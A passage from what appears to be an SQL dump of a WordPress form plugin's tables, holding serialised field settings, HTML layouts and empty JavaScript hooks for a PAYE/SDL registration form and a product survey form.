SDL?*:*w_field_label*:*400*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*21*:*id*:*type_text*:*type*:*SDL Liability Date*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*25*:*id*:*type_arithmetic_captcha*:*type*:*Word Verification:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yes*:*w_hide_label*:*2*:*w_count*:*+, -,*:*w_operations*:**:*w_class*:*60*:*w_input_size*:**:*new_field*:*26*:*id*:*type_submit_reset*:*type*:*type_submit_reset_26*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*8*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yes*:*w_hide_label*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*14*:*id*:*type_text*:*type*:*Postal Address*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'PAYE Registration','','','none',0),(68,0,16,'PAYE Registration','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail:%</div><div wdid=\"16\" class=\"wdform_row ui-sortable-handle\">%16 - Cell Number%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Phone:%</div><div wdid=\"17\" class=\"wdform_row ui-sortable-handle\">%17 - Fax Number%</div></div></div><div wdid=\"4\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%4 - custom_4%</div><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Company Name%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Company Registration Number%</div><div wdid=\"22\" class=\"wdform_row ui-sortable-handle\">%22 - Would you like to register for PAYE only?%</div><div wdid=\"20\" class=\"wdform_row ui-sortable-handle\">%20 - PAYE Liability Date%</div><div wdid=\"23\" class=\"wdform_row ui-sortable-handle\">%23 - Would you like to register for both PAYE and SDL?%</div><div wdid=\"21\" class=\"wdform_row ui-sortable-handle\">%21 - SDL Liability Date%</div><div wdid=\"25\" class=\"wdform_row ui-sortable-handle\">%25 - Word Verification:%</div><div wdid=\"26\" class=\"wdform_row ui-sortable-handle\">%26 - type_submit_reset_26%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - Address:%</div><div wdid=\"14\" class=\"wdform_row ui-sortable-handle\">%14 - Postal Address%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',27,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#16#**id**#Cell Number#**label**#type_text#****#3#**id**#Phone:#**label**#type_phone#****#17#**id**#Fax Number#**label**#type_text#****#5#**id**#Company Name#**label**#type_text#****#6#**id**#Company Registration Number#**label**#type_text#****#22#**id**#Would you like to register for PAYE only?#**label**#type_radio#****#20#**id**#PAYE Liability Date#**label**#type_text#****#23#**id**#Would you like to register for both PAYE and SDL?#**label**#type_radio#****#21#**id**#SDL Liability Date#**label**#type_text#****#25#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#26#**id**#type_submit_reset_26#**label**#type_submit_reset#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Postal Address#**label**#type_text#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#16#**id**#Cell Number#**label**#type_text#****#3#**id**#Phone:#**label**#type_phone#****#17#**id**#Fax Number#**label**#type_text#****#5#**id**#Company Name#**label**#type_text#****#6#**id**#Company Registration Number#**label**#type_text#****#22#**id**#Would you like to register for PAYE only?#**label**#type_radio#****#20#**id**#PAYE Liability Date#**label**#type_text#****#23#**id**#Would you like to register for both PAYE and SDL?#**label**#type_radio#****#21#**id**#SDL Liability Date#**label**#type_text#****#25#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#26#**id**#type_submit_reset_26#**label**#type_submit_reset#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Postal Address#**label**#type_text#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*16*:*id*:*type_text*:*type*:*Cell Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*17*:*id*:*type_text*:*type*:*Fax Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_section_break*:*type*:*custom_4*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*5*:*id*:*type_text*:*type*:*Company Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_text*:*type*:*Company Registration Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*22*:*id*:*type_radio*:*type*:*Would you like to register for PAYE only?*:*w_field_label*:*300*:*w_field_label_size*:*top*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Yes***No*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*20*:*id*:*type_text*:*type*:*PAYE Liability Date*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*23*:*id*:*type_radio*:*type*:*Would you like to register for both PAYE and SDL?*:*w_field_label*:*400*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Yes***No*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*21*:*id*:*type_text*:*type*:*SDL Liability Date*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*25*:*id*:*type_arithmetic_captcha*:*type*:*Word Verification:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yes*:*w_hide_label*:*2*:*w_count*:*+, -,*:*w_operations*:**:*w_class*:*60*:*w_input_size*:**:*new_field*:*26*:*id*:*type_submit_reset*:*type*:*type_submit_reset_26*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*8*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yes*:*w_hide_label*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*14*:*id*:*type_text*:*type*:*Postal Address*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'PAYE Registration','','','none',0),(69,0,5,'Product Survey','embedded','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - 1. Please indicate if you agree or disagree with the following statements%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - 2. How likely are you to recommend [Product/Service] to a friend or co-worker?%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - 3. What is the amount you would ever pay for a product like ours%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - 4. Please rate the product %</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - type_submit_reset_6%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',2,'// Occurs before the form is loaded\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before submitting  the form\r\nfunction before_submit()\r\n{\r\n// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don&#39;t need to return any value if you don&#39;t want to stop the submission.\r\n}\r\n\r\n// Occurs just before resetting the form\r\nfunction before_reset()\r\n{\r\n\r\n}','','',0,'%all%','%all%',7,1,'2#**id**#1. Please indicate if you agree or disagree with the following statements#**label**#type_matrix#****#3#**id**#2. How likely are you to recommend [Product/Service] to a friend or co-worker?#**label**#type_scale_rating#****#4#**id**#3. What is the amount you would ever pay for a product like ours#**label**#type_range#****#5#**id**#4. Please rate the product #**label**#type_star_rating#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#','2#**id**#1. Please indicate if you agree or disagree with the following statements#**label**#type_matrix#****#3#**id**#2. How likely are you to recommend [Product/Service] to a friend or co-worker?#**label**#type_scale_rating#****#4#**id**#3. What is the amount you would ever pay for a product like ours#**label**#type_range#****#5#**id**#4. Please rate the product #**label**#type_star_rating#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'','','USD',0,'2*:*id*:*type_matrix*:*type*:*1. Please indicate if you agree or disagree with the following statements*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*radio*:*w_field_input_type*:****Product is affordable***Product is valuable***Product is better<br> than other products on<br> the market***Product is easy to use*:*w_rows*:****Strongly Disagree***Disagree***Neutral***Agree***Strongly Agree*:*w_columns*:*no*:*w_required*:*wdform_matrix*:*w_class*:**:*w_textbox_size*:**:*new_field*:*3*:*id*:*type_scale_rating*:*type*:*2. How likely are you to recommend [Product/Service] to a friend or co-worker?*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*Will not recommend  ***  I will recommend*:*w_mini_labels*:*5*:*w_scale_amount*:*no*:*w_required*:*wdform_scale_rating*:*w_class*:**:*new_field*:*4*:*id*:*type_range*:*type*:*3. What is the amount you would ever pay for a product like ours*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*40*:*w_field_range_width*:*1*:*w_field_range_step*:*null*:*w_field_value1*:*null*:*w_field_value2*:*From***To*:*w_mini_labels*:*no*:*w_required*:**:*w_class*:**:*new_field*:*5*:*id*:*type_star_rating*:*type*:*4. Please rate the product *:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*yellow*:*w_field_label_col*:*10*:*w_star_amount*:*no*:*w_required*:*wdform_star_rating*:*w_class*:**:*new_field*:*6*:*id*:*type_submit_reset*:*type*:*type_submit_reset_6*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Product Survey','','','none',1),(70,1,5,'Product Survey','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - 1. Please indicate if you agree or disagree with the following statements%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - 2. How likely are you to recommend [Product/Service] to a friend or co-worker?%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - 3. What is the amount you would ever pay for a product like ours%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - 4. Please rate the product %</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - type_submit_reset_6%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',2,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',7,1,'2#**id**#1. Please indicate if you agree or disagree with the following statements#**label**#type_matrix#****#3#**id**#2. How likely are you to recommend [Product/Service] to a friend or co-worker?#**label**#type_scale_rating#****#4#**id**#3. What is the amount you would ever pay for a product like ours#**label**#type_range#****#5#**id**#4. Please rate the product #**label**#type_star_rating#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#','2#**id**#1. Please indicate if you agree or disagree with the following statements#**label**#type_matrix#****#3#**id**#2. How likely are you to recommend [Product/Service] to a friend or co-worker?#**label**#type_scale_rating#****#4#**id**#3. What is the amount you would ever pay for a product like ours#**label**#type_range#****#5#**id**#4. Please rate the product #**label**#type_star_rating#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'2*:*id*:*type_matrix*:*type*:*1. Please indicate if you agree or disagree with the following statements*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*radio*:*w_field_input_type*:****Product is affordable***Product is valuable***Product is better<br> than other products on<br> the market***Product is easy to use*:*w_rows*:****Strongly Disagree***Disagree***Neutral***Agree***Strongly Agree*:*w_columns*:*no*:*w_required*:*wdform_matrix*:*w_class*:**:*w_textbox_size*:**:*new_field*:*3*:*id*:*type_scale_rating*:*type*:*2. How likely are you to recommend [Product/Service] to a friend or co-worker?*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*Will not recommend  ***  I will recommend*:*w_mini_labels*:*5*:*w_scale_amount*:*no*:*w_required*:*wdform_scale_rating*:*w_class*:**:*new_field*:*4*:*id*:*type_range*:*type*:*3. What is the amount you would ever pay for a product like ours*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*40*:*w_field_range_width*:*1*:*w_field_range_step*:*null*:*w_field_value1*:*null*:*w_field_value2*:*From***To*:*w_mini_labels*:*no*:*w_required*:**:*w_class*:**:*new_field*:*5*:*id*:*type_star_rating*:*type*:*4. Please rate the product *:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*yellow*:*w_field_label_col*:*10*:*w_star_amount*:*no*:*w_required*:*wdform_star_rating*:*w_class*:**:*new_field*:*6*:*id*:*type_submit_reset*:*type*:*type_submit_reset_6*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Product Survey','','','none',1),(71,1,16,'PAYE Registration','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail:%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Phone:%</div><div wdid=\"16\" class=\"wdform_row ui-sortable-handle\">%16 - Cell Number%</div><div wdid=\"17\" class=\"wdform_row ui-sortable-handle\">%17 - Fax Number%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - Address:%</div><div wdid=\"14\" class=\"wdform_row ui-sortable-handle\">%14 - Postal Address%</div></div></div><div wdid=\"4\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%4 - custom_4%</div><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Company Name%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Company Registration Number%</div><div wdid=\"22\" class=\"wdform_row ui-sortable-handle\">%22 - Would you like to register for PAYE only?%</div><div wdid=\"20\" class=\"wdform_row ui-sortable-handle\">%20 - PAYE Liability Date%</div><div wdid=\"23\" class=\"wdform_row ui-sortable-handle\">%23 - Would you like to register for both PAYE and SDL?%</div><div wdid=\"21\" class=\"wdform_row ui-sortable-handle\">%21 - SDL Liability Date%</div><div wdid=\"25\" class=\"wdform_row ui-sortable-handle\">%25 - Word Verification:%</div><div wdid=\"26\" class=\"wdform_row ui-sortable-handle\">%26 - type_submit_reset_26%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',27,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Phone:#**label**#type_phone#****#16#**id**#Cell Number#**label**#type_text#****#17#**id**#Fax Number#**label**#type_text#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Postal Address#**label**#type_text#****#5#**id**#Company Name#**label**#type_text#****#6#**id**#Company Registration Number#**label**#type_text#****#22#**id**#Would you like to register for PAYE only?#**label**#type_radio#****#20#**id**#PAYE Liability Date#**label**#type_text#****#23#**id**#Would you like to register for both PAYE and SDL?#**label**#type_radio#****#21#**id**#SDL Liability Date#**label**#type_text#****#25#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#26#**id**#type_submit_reset_26#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Phone:#**label**#type_phone#****#16#**id**#Cell Number#**label**#type_text#****#17#**id**#Fax Number#**label**#type_text#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Postal Address#**label**#type_text#****#5#**id**#Company Name#**label**#type_text#****#6#**id**#Company Registration Number#**label**#type_text#****#22#**id**#Would you like to register for PAYE only?#**label**#type_radio#****#20#**id**#PAYE Liability Date#**label**#type_text#****#23#**id**#Would you like to register for both PAYE and SDL?#**label**#type_radio#****#21#**id**#SDL Liability Date#**label**#type_text#****#25#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#26#**id**#type_submit_reset_26#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*3*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*16*:*id*:*type_text*:*type*:*Cell Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*17*:*id*:*type_text*:*type*:*Fax Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*8*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yes*:*w_hide_label*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*14*:*id*:*type_text*:*type*:*Postal Address*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_section_break*:*type*:*custom_4*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*5*:*id*:*type_text*:*type*:*Company 